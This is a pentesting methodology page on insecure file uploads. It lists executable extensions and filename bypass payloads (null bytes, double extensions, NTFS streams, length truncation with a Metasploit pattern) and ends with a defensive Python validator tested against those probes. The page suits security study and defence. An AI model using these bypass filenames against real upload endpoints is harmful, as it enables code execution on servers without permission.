# Insecure File Uploads

{% hint style="success" %}
Related Sites:

* [Pentesting: File Upload](https://book.hacktricks.xyz/pentesting-web/file-upload)
{% endhint %}

## File Upload General Methodology

***

### Other useful extensions:

**PHP**: `.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module`

**Working in PHPv8**: `.php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp`

**ASP**: `.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml`

**Jsp**: `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`

**Coldfusion**: `.cfm, .cfml, .cfc, .dbm`

**Flash**: `.swf`

**Perl**: `.pl, .cgi`

**Erlang Yaws Web Server**: `.yaws`

### Bypass file extensions checks

If the application checks extensions, test the previous extensions first. Also test them with some **uppercase letters**, since many checks compare case-sensitively: `pHp`, `.pHP5`, `.PhAr`…

Check adding a valid extension before the execution extension (use previous extensions also):

* `file.png.php`
* `file.png.Php5`

Try adding **special characters at the end**. You can use Burp to brute-force all ASCII and Unicode characters. (Note that you can also combine these with the previously mentioned extensions.)

* `file.php%20`
* `file.php%0a`
* `file.php%00`
* `file.php%0d%0a`
* `file.php/`
* `file.php.`
* `file.`
* `file.php....`
* `file.pHp5....`

Try to bypass the protections by tricking the server-side extension parser with techniques like **doubling the extension or adding junk data (null bytes) between extensions**. You can also combine these with the previous extensions to prepare a better payload.

* `file.png.php`
* `file.png.pHp5`
* `file.php#.png`
* `file.php%00.png`
* `file.php\x00.png`
* `file.php%0a.png`
* `file.php%0d%0a.png`
* `file.phpJunk123png`

Add another layer of extensions to the previous check:

* `file.png.jpg.php`
* `file.php%00.png%00.jpg`

Try putting the **exec extension before the valid extension** and hope the server is misconfigured. This is useful for Apache misconfigurations (e.g. a broad `AddHandler` directive) where any file whose name contains the **.php extension anywhere, not necessarily at the end**, is executed as code:

* **ex**: `file.php.png`

Using NTFS alternate data streams (ADS) on Windows: a colon character “`:`” is inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension is created on the server (e.g. “`file.asax:.jpg`”). This file might be edited later using other techniques, such as its short (8.3) filename. The “`::$data`” pattern can also be used to create non-empty files. Adding a dot character after this pattern might also be useful to bypass further restrictions (e.g. “`file.asp::$data.`”).

Try to **break the filename length limit**: if the server truncates over-long names, the valid extension at the end gets cut off and the malicious `.php` extension is what remains, e.g. `AAA<--SNIP-->AAA.php`.

```shell
# Linux: the maximum filename length is 255 bytes

# Generate a 255-byte cyclic pattern to measure where the server truncates
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png


# Upload the file and check in the response how many characters it allows. Let's say 236

# 232 A's + ".php" = 236 characters, so the trailing ".png" is what gets truncated
python3 -c 'print("A" * 232)'

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


# Make the payload

AAA<--SNIP 232 A-->AAA.php.png
```
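The following is an added, defender-side illustration (not code from the original page): a typical weak "contains an image extension" check, which every pattern listed above passes, beside a strict validator that anchors the whole name, allowlists the single final extension and lets the server choose the stored filename. The allowlist, the function names and the probe list are constructed for this example.

```python
import re
import secrets

# Constructed allowlist for the example; a real application keeps its own.
ALLOWED_IMAGE_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Exactly one name token and one extension, from [A-Za-z0-9_-] only, so a
# second dot, "%", ":", NUL, newline or trailing padding can never match.
_STRICT_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def naive_is_image(filename: str) -> bool:
    """The weak check the payloads above defeat: any allowed extension
    found anywhere in the lower-cased name is accepted."""
    lower = filename.lower()
    return any("." + ext in lower for ext in ALLOWED_IMAGE_EXTENSIONS)


def strict_image_extension(filename: str):
    """Return the canonical extension ('png', ...) when the whole name has
    the strict shape and the extension is allowlisted, otherwise None.
    fullmatch anchors both ends, so 'x.png\\n', 'x.php.png', 'x.php%00.png'
    and 'x.asax:.jpg' all fail before the allowlist is even consulted."""
    m = _STRICT_NAME.fullmatch(filename)
    if m is None:
        return None
    ext = m.group(1).lower()          # pHp5 / PNG are folded before lookup
    return ext if ext in ALLOWED_IMAGE_EXTENSIONS else None


def storage_name(filename: str):
    """Server-chosen name: random token + canonical extension. The client
    string never reaches the filesystem, so ADS suffixes, multi-extension
    handler rules and 255-byte truncation have nothing to act on."""
    ext = strict_image_extension(filename)
    return None if ext is None else f"{secrets.token_hex(16)}.{ext}"


# Constructed probes taken from the bypass patterns listed on this page.
PROBES = [
    "file.png.php", "file.png.pHp5", "file.php%00.png", "file.php\x00.png",
    "file.php%0a.png", "file.php.png", "file.asax:.jpg", "photo.png\n",
    "A" * 232 + ".php.png", "photo.PNG",
]


def compare(probes=PROBES):
    """Map each probe to (naive verdict, strict verdict)."""
    return {p: (naive_is_image(p), strict_image_extension(p) is not None)
            for p in probes}
```

Only `photo.PNG` passes the strict validator; every other probe is accepted by the naive check and rejected by the strict one.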
